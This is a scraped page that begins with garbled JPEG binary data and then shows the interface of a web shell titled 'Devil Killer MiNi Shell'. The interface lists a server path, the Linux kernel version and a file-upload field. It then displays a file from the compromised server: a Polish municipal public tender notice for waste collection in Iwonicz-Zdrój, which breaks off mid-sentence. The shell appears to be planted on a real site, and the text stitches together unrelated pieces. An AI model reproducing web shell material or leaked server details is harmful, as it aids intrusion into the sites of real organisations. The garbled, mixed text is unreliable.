JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231106/0047750201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie odpadów w 2024 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Iwonicz-Zdrój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440548</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Słoneczna 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iwonicz-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-440</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134350212</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@iwonicz-zdroj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.iwonicz-zdroj.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie odpadów w 2024 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4ff2b180-7c7f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00477502</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00004916/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór, transport i zagospodarowanie odpadów w 2024 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/iwonicz-zdroj/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający wymaga komunikowania się za pośrednictwem platformy SmartPzp pod adresem https://portal.smartpzp.pl/iwonicz-zdroj/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W przedmiotowym postępowaniu ofertę, oświadczenie, o którym mowa w art. 125 ust. 1, składa się, pod rygorem nieważności, w formie elektronicznej (czyli opatrzonej podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>Zamawiający, zgodnie z obowiązującymi w tym zakresie przepisami, określa niezbędne wymagania techniczne umożliwiające pracę na https://portal.smartpzp.pl/iwonicz-zdroj/, tj.:<br/>1) Przeglądarka internetowa.<br/>Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11. Zalecane: Mozilla Firefox, Google Chrome, Opera<br/>2) Środowisko Java.<br/>Oprogramowanie Java ver. 1.8. (UWAGA ver. 1.8. WYMAGANA).<br/>3) Sprzęt komputerowy.<br/>Komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 8, Mac Os x 10 4, Linux, lub ich nowsze wersje.<br/>W przypadku problemów technicznych czy pytań jest dostępna infolinia w dni robocze godz. 7.00 – 17.00 pod nr tel.+48 22 123 07 97, mail: pomoc@portalpzp.pl <br/>Zamawiający informuje, że instrukcje korzystania z portalu dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu portalu znajdują się w zakładce „e-learning” „Instrukcja użytkownika Wykonawcy SMARTPZP” na stronie internetowej pod adresem: https://portal.smartpzp.pl/iwonicz-zdroj/<br/>Ważne zalecenie! <br/>W zależności od formatu kwalifikowanego podpisu (PAdES, XAdES) i jego typu (zewnętrzny, wewnętrzny) Wykonawca dołącza do Systemu uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny): <br/>1) dokumenty w formacie „pdf” należy podpisywać tylko formatem PAdES; <br/>2) Zamawiający dopuszcza podpisanie dokumentów w formacie innym niż „pdf”, wtedy należy użyć formatu XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.4.2023.IZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie polega na odbiorze i transporcie odpadów komunalnych niesegregowanych (zmieszanych), odpadów ulegających biodegradacji i odpadów selektywnie zbieranych oraz odbiorze, transporcie i zagospodarowaniu odpadów komunalnych innych niż zmieszane odpady komunalne, odpady ulegające biodegradacji oraz selektywnie zbierane z terenu Gminy Iwonicz-Zdrój powstałych na nieruchomościach zamieszkałych.<br/>1.	Odpady komunalne będą odbierane z nieruchomości zamieszkałych, położonych na terenie Gminy Iwonicz-Zdrój. Szacunkowa liczba mieszkańców gminy wynosi 10471 – stan na 30.09.2023 r., z czego 1531 osób mieszka w Iwoniczu-Zdroju, a 8940 w trzech sołectwach: Iwonicz, Lubatowa i Lubatówka. Na dzień 30.09.2023 r. deklaracje w sprawie opłat za gospodarowanie odpadami komunalnymi złożyło 2598 gospodarstw domowych, a liczba osób deklarujących zbieranie odpadów wyniosła 8269. Na terenie gminy przeważa zabudowa mieszkaniowa jednorodzinna, w terenach wiejskich – rozproszona. Zabudowa wielomieszkaniowa zlokalizowana jest na terenie miejskim (ok.18 budynków) oraz w miejscowości Iwonicz (5 budynków), z łączną ilością mieszkań 296. <br/>2.	Systemem zbiórki odpadów komunalnych objęty zostanie teren całej gminy według uzgodnionych pomiędzy Zamawiającym a Wykonawcą tras przejazdu - mapę poglądową z naniesionymi trasami przejazdu samochodów zawiera załącznik nr 3. Długość jednorazowej trasy przejazdu po obszarze całej gminy szacuje się na ok. 45 km.<br/>3.	Zakres przedmiotu zamówienia obejmuje odbiór:<br/>1)	zmieszanych niesegregowanych odpadów komunalnych o kodzie 20 03 01 zgromadzonych w workach i pojemnikach w ilości ok. 970 Mg,<br/>2)	segregowanych odpadów komunalnych, gromadzonych w sposób selektywny w odpowiednio oznakowanych workach lub pojemnikach, podanych poniżej rodzajów odpadów w ilości ok. 470 Mg:<br/>a)	tworzywa sztuczne, w tym odpady opakowaniowe z tworzyw sztucznych,<br/>b)	papier, w tym tektury, odpady opakowaniowe z papieru i tektury,<br/>c)	szkło i opakowania ze szkła,<br/>d)	metale, w tym odpady opakowaniowe z metalu, <br/>e)	zmieszane odpady opakowaniowe, w tym opakowania wielomateriałowe,<br/>f) odpady zielone oraz ulegające biodegradacji, ze szczególnym uwzględnieniem bioodpadów,<br/>3)	pozostałych odpadów, w tym problematycznych w ilości ok. 223,70 Mg, w szczególności: <br/>a)	odpadów wielkogabarytowych, w tym mebli,<br/>b)	zużytych opon,<br/>c)	przeterminowanych leków i chemikaliów,<br/>d)	odpadów budowlanych i rozbiórkowych, w tym materiałów izolacyjnych (m. in. styropian, wełna mineralna),<br/>e)	popiołu z palenisk domowych,<br/>f) zużytego sprzętu elektrycznego i elektronicznego,<br/>g)	zużytych baterii i akumulatorów,<br/>h)	odpadów niebezpiecznych (m.in. farby, tusze, rozpuszczalniki, kwasy, detergenty, środki ochrony roślin, oleje przepracowane (np. silnikowe, przekładniowe),<br/>i) odpadów niekwalifikujących się do odpadów medycznych powstałych w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi, w szczególności igieł i strzykawek,<br/>j) inne niewymienione frakcje zbierane w sposób selektywny, w tym m.in. odzież, tekstylia, włókno szklane.<br/>4.	Odbiorem, transportem do RIPOK Krosno objęte są odpady z ust. 3 pkt 3 ppkt 1-2. Wykonawca pokrywa koszty odbioru i transportu, koszty zagospodarowania pokrywa Gmina Iwonicz-Zdrój zgodnie z zawartym porozumieniem z Gminą Krosno dotyczącym zagospodarowania odpadów. <br/>5.	Odbiorem, transportem i zagospodarowaniem objęte są odpady z ust. 3 pkt 3 ppkt 3. Koszty odbioru, transportu i zagospodarowania odpadów pokrywa Wykonawca. <br/>Zamawiający nie wskazuje miejsca zagospodarowania odpadów, o których mowa w niniejszym ustępie, pozostawiając decyzję Wykonawcy gdzie i komu przekaże odpady do dalszego wykorzystania, ponownego użycia, recyklingu czy unieszkodliwienia.<br/>6.	Oznakowanie worków i pojemników:<br/>1)	niesegregowane (zmieszane) odpady komunalne<br/>a)	opisany kontener <br/>b)	worek lub pojemnik koloru szarego, z białą nalepką umieszczoną w widocznym miejscu,<br/>2)	odpady segregowane: tworzywa sztuczne, odpady wielomateriałowe, drobny metal, w tym odpady opakowaniowe z tworzyw sztucznych i metalu,<br/>a)	opisany kontener<br/>b)	worek lub pojemnik koloru żółtego, z białą nalepką umieszczoną w widocznym miejscu,<br/>3)	odpady segregowane: szkło i opakowania ze szkła<br/>a)	opisany kontener<br/>b)	worek lub pojemnik koloru zielonego, z białą nalepką umieszczoną w widocznym miejscu,<br/>4) odpady segregowane: papier i tektura oraz odpady opakowaniowe z tych materiałów:<br/>a)	opisany kontener<br/>b)	worek lub pojemnik koloru niebieskiego, z białą nalepką umieszczoną w widocznym miejscu,<br/>5) odpady ulegające biodegradacji, w tym bioodpady:<br/>a)	opisany kontener,<br/>b)	worek lub pojemnik koloru brązowego, z biała nalepką umieszczoną w widocznym miejscu.<br/>Dopuszcza się możliwość pokrycia pojemników innych niż worki odpowiednim kolorem tylko w części, nie mniejszej niż 30% zewnętrznej całkowitej powierzchni pojemnika, widoczny dla korzystających z pojemnika. Naklejka koloru białego zawiera oznaczenie gminy, nazwę frakcji odpadów oraz kod identyfikacyjny wytwórcy odpadów.<br/>7.	Częstotliwość wywozu poszczególnych frakcji odpadów od właścicieli budynków jednorodzinnych:<br/>1)	odpady zmieszane niesegregowane gromadzone w workach i pojemnikach - 2 razy w miesiącu (raz na dwa tygodnie) w miejscowościach Iwonicz-Zdrój, Iwonicz, Lubatowa, Lubatówka, <br/>2)	odpady segregowane: <br/>a)	tworzywa sztuczne, odpady wielomateriałowe, drobny metal, gromadzone w workach lub pojemnikach – 2 razy w miesiącu (raz na dwa tygodnie) w miejscowościach Iwonicz-Zdrój, Iwonicz, Lubatowa, Lubatówka,<br/>b)	papier i tektura gromadzone w workach lub pojemnikach – 1 raz na dwa miesiące w miejscowościach Iwonicz-Zdrój, Iwonicz, Lubatowa, Lubatówka,<br/>c)	szkło i opakowania ze szkła gromadzone w workach lub pojemnikach – 1 raz na dwa miesiące w miejscowościach Iwonicz-Zdrój, Iwonicz, Lubatowa, Lubatówka,<br/>8.	Częstotliwość wywozu poszczególnych frakcji odpadów z budynków wielomieszkaniowych:<br/>1)	odpady zmieszane niesegregowane gromadzone w workach i pojemnikach – 1 raz w tygodniu,<br/>2)	odpady segregowane: <br/>a)	tworzywa sztuczne, odpady wielomateriałowe, drobny metal, gromadzone w workach lub pojemnikach – 2 razy w miesiącu (raz na dwa tygodnie),<br/>b)	papier i tektura, gromadzone w workach lub pojemnikach – 1 raz na dwa miesiące,<br/>c)	szkło i opakowania ze szkła gromadzone w workach lub pojemnikach – 1 raz na dwa miesiące,<br/>9.	Częstotliwość wywozu pozostałych odpadów gromadzonych na PSZOK:<br/>1) odpady zielone oraz ulegające biodegradacji – 20-krotny wywóz kontenera KP7,<br/>2) odpady wielkogabarytowe – 15 razy w okresie obowiązywania umowy odbiór z PSZOK z kwatery gromadzone luzem –Wykonawca zapewnia transport umożliwiający wywóz zgłoszonej ilości odpadów, <br/>3) zużyte opony – 8 razy w okresie obowiązywania umowy odbiór z PSZOK ze składu gromadzone luzem – Wykonawca zapewnia transport umożliwiający wywóz zgłoszonej ilości odpadów, <br/>4) przeterminowane leki – 4 razy w okresie obowiązywania umowy,<br/>5) odpady budowlane i rozbiórkowe, w tym materiały izolacyjne (m. in. styropian, wełna mineralna) – 20-krotny wywóz kontenera KP7,<br/>6) popiół – 10 razy w okresie obowiązywania umowy,<br/>7) zużyty sprzęt elektryczny i elektroniczny – 4 razy w okresie obowiązywania umowy,<br/>8) baterie i akumulatory – 1 raz w okresie obowiązywania umowy,<br/>9) inne odpady niebezpieczne – 1 raz w okresie obowiązywania umowy,<br/>10) odpady niekwalifikujące się do odpadów medycznych powstałych w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi, w szczególności igieł <br/>i strzykawek – 1 raz w okresie obowiązywania umowy<br/>11) odpady segregowane, o których mowa w ust. 3 pkt 3 ppkt 2 lit. a-e – zgodnie z harmonogramem odbioru odpadów uzgodnionym z Zamawiającym, o którym mowa w SWZ,<br/>12) inne niewymienione frakcje zbierane w sposób selektywny – 1 raz z PSZOK gromadzone luzem.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oferty będą oceniane wg następującego kryterium o znaczeniu określonym udziałem procentowym jn.: <br/>•	Cena oferty brutto - 60 % <br/>•	Częstotliwość odbioru wskazanych odpadów - 40%<br/><br/>2. Stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium.<br/>3. Zamawiający oceniał będzie złożone oferty wyłącznie w oparciu o wskazane kryteria, w skali punktowej od 1 do 100 na podstawie złożonej oferty.<br/>4. Maksymalna ilość punktów jaką po zsumowaniu punktów dla każdego kryterium może uzyskać oferta wynosi 100.<br/>5. Zamawiający poda wyniki do dwóch miejsc po przecinku.<br/>6. Zasady przyznawania punktów dla poszczególnych kryteriów:<br/><br/>1)	Cena oferty (Kc) - kryterium temu przypisuje się wagę maksymalnie 60%.<br/>a)	Kryterium ceny dotyczy ceny brutto wyrażonej w pozycji - cena oferty brutto w PLN, określonej w formularzu ofertowym.<br/>b)	Liczba punktów jaką otrzyma każda z ofert zostanie ustalona w następujący sposób:<br/><br/>•	oferta która zawiera najniższą cenę brutto otrzyma maksymalną liczbę punktów przewidzianą dla tego kryterium (60 pkt.),<br/>•	ilość punktów jaką otrzymają pozostałe oferty zostanie ustalona wg wzoru:<br/>Kc = (Cn : Cb) x 60% x 100<br/><br/>Cn - najniższa zaoferowana cena brutto,<br/>Cb - cena brutto badanej oferty.<br/><br/>2)	Częstotliwość odbioru wskazanych odpadów (Ko) - kryterium temu przypisuje się wagę maksymalnie 40 % (łącznie ppkt a) i b)). <br/>Ocena na podstawie tego kryterium przyznawana będzie za zwiększenie częstotliwości odbioru wskazanych odpadów.<br/><br/>a)	Odpady budowlane, rozbiórkowe i izolacyjne – maksymalnie 20 pkt:<br/>- odbiór 20 raz w roku – 0 pkt<br/>- odbiór 22 razy w roku – 10 pkt<br/>- odbiór 24 razy w roku – 20 pkt<br/><br/>b)	Popiół – maksymalnie 20 pkt:<br/>- odbiór 10 razy w roku – 0 pkt<br/>- odbiór 11 razy w roku – 10 pkt<br/>- odbiór 12 razy w roku – 20 pkt<br/><br/>Ilość punktów przyznanych w kryterium (Ko) stanowić będzie suma punktów przyznanych w ppkt a) i ppkt b)<br/><br/>UWAGA!<br/>W przypadku gdy Wykonawca nie wypełni pól w formularzu ofertowym, dotyczących częstotliwości odbioru wskazanych odpadów, Zamawiający uzna, że Wykonawca zaproponował minimalną wymaganą w SWZ ilość odbioru wskazanych odpadów tj. 20 razy w roku dla odpadów budowlanych, rozbiórkowych i izolacyjnych oraz 10 razy w roku dla popiołu.<br/><br/>3) Łączna ilość punktów do porównywania ofert jaką otrzyma dana oferta, zostanie ustalona w następujący sposób: K = Kc + Ko<br/><br/>7. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwość odbioru wskazanych odpadów.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>Określenie wymagań:<br/>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże, że posiada: <br/>a)	aktualny wpis do rejestru działalności regulowanej prowadzonego przez Burmistrza Gminy Iwonicz-Zdrój, o którym mowa w art. 9b i 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2023 r. poz. 1469 z późn. zm.),<br/>b)	aktualny wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami, zgodnie z wymogami ustawy o odpadach (Dz. U. z 2023 r. poz. 1587 z późn. zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, wykonawca zobowiązany jest złożyć:<br/>a)	aktualny wpis do rejestru działalności regulowanej prowadzonego przez Burmistrza Gminy Iwonicz-Zdrój, o którym mowa w art. 9b i 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2023 r. poz. 1469 z późn. zm.),<br/>b) aktualny wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących 